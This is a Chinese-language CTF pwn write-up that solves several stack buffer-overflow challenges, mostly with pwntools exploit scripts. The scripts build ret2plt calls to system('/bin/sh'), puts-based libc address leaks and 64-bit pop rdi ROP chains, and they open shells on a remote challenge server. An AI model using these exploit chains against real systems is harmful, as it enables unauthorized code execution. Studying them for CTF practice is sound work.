nc 直连cat flag
使用ROPgadgets查找
system
和/bin/sh
的地址拼接payload
exp
from pwn import *
#sh = process('./stack')
elf = ELF('./stack')
sh = remote('111.231.70.44',28030)
sys_addr = elf.plt['system']
bin_addr = elf.search('/bin/sh').next()
payload = 'a' * 13
payload += p32(sys_addr)
payload += p32(0)
payload += p32(bin_addr)
sh.recvuntil("\n")
sh.sendline(payload)
sh.interactive()
这个题目是今天刚做出来的,昨天刚学的libc,刚好刷到这道题目,可以看到这个题目中没有system
和/bin/sh
了,但是看到了puts
,直接puts泄露libc地址,利用libc里的system
和/bin/sh
字符串来getshell.
exp
from pwn import *
#sh = process('./stack1')
sh = remote('111.231.70.44',28007)
context.log_level = 'debug'
elf = ELF('./stack1')
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('/home/ly0n/pwn/tools/libc6-i386_2.27-3ubuntu1_amd64.so')
puts_plt_addr =elf.plt['puts']
puts_got_addr =elf.got['puts']
main_addr =elf.sym['_start']
payload = "a"*13
payload += p32(puts_plt_addr)
payload += p32(main_addr)
payload += p32(puts_got_addr)
sh.recvuntil('!\n')
sh.sendline(payload)
sh.recvuntil("\n\n")
puts_addr = u32(sh.recv(4))
print "puts:"
print hex(puts_addr)
libc_puts_addr = int(libc.sym['puts'])
base_addr = puts_addr-libc_puts_addr
system_addr = base_addr+int(libc.sym['system'])
binsh_addr = base_addr+int(libc.search('/bin/sh').next())
max_payload = 'a' * 13
print "base:"
print hex(base_addr)
print "system:"
print hex(system_addr)
print "binsh:"
print hex(binsh_addr)
max_payload += p32(system_addr)
max_payload += p32(main_addr)
max_payload += p32(binsh_addr)
sleep(1)
sh.recvuntil("\n")
sleep(1)
sh.sendline(max_payload)
sh.interactive()
emmmmmm我还没做,看了感觉应该是格式化字符串的漏洞,我还没学到,学到在做吧哈哈?
32程序中有system
和字符串/bin/sh
,拼接payload即可,这里要注意的是需要一个返回地址
from pwn import *
#sh = process('./pwn5')
#context.log_level = 'debug'
elf = ELF('./pwn5')
sh = remote('111.231.70.44',28054)
sys_addr = elf.plt['system']
bin_addr = elf.search('/bin/sh').next()
payload = 'a' * 24
payload += p32(sys_addr)
payload += p32(0)
payload += p32(bin_addr)
sh.sendline(payload)
sh.interactive()
和pwn5题型一样,不过是64位程序,返回地址是pop rdi
exp
from pwn import *
sh = process('./pwn')
context.log_level = 'debug'
elf = ELF('./pwn')
rdi_addr = 0x0000000000400643
sys_addr = elf.plt['system']
bin_addr = elf.search('/bin/sh').next()
payload = 'a' * 20
payload += p64(rdi_addr)
payload += p64(bin_addr)
payload += p64(sys_addr)
sh.sendline(payload)
sh.interactive()
这次没有shell了,拖进IDA里看到了有puts,想着可以通过puts
泄露libc地址,一把梭吧
今天我竟然做出来了两道libc的题,晚饭可以加个鸡蛋了,哈哈哈???
exp:
from pwn import *
#sh = process('./pwn')
sh = remote('111.231.70.44',28052)
context.log_level = 'debug'
elf = ELF('./pwn')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('/home/ly0n/pwn/tools/libc6_2.27-3ubuntu1_amd64.so')
pop_rdi = 0x00000000004006e3
ret_add = 0x00000000004004c6
puts_plt_addr =elf.plt['puts']
puts_got_addr =elf.got['puts']
main_addr =elf.sym['_start']
payload = "a" *20
payload += p64(pop_rdi)
payload += p64(puts_got_addr)
payload += p64(puts_plt_addr)
payload += p64(main_addr)
sh.sendline(payload)
puts_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print "puts:"
print hex(puts_addr)
libc_puts_addr = libc.sym['puts']
base_addr = puts_addr-libc_puts_addr
system_addr = base_addr+libc.sym['system']
binsh_addr = base_addr+libc.search('/bin/sh').next()
payload = 'a' * 20
print "base:"
print hex(base_addr)
print "system:"
print hex(system_addr)
print "binsh:"
print hex(binsh_addr)
payload += p64(ret_add)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += p64(main_addr)
sh.sendline(payload)
sh.interactive()
简单
exp:
from pwn import *
sh = process('./pwn')
context.log_level = 'debug'
elf = ELF('./pwn')
rdi_addr = 0x0000000000400733
sys_addr = elf.plt['system']
bin_addr = elf.search('/bin/sh').next()
payload = 'a' * 136
payload += p64(rdi_addr)
payload += p64(bin_addr)
payload += p64(sys_addr)
sh.sendline(payload)
sh.interactive()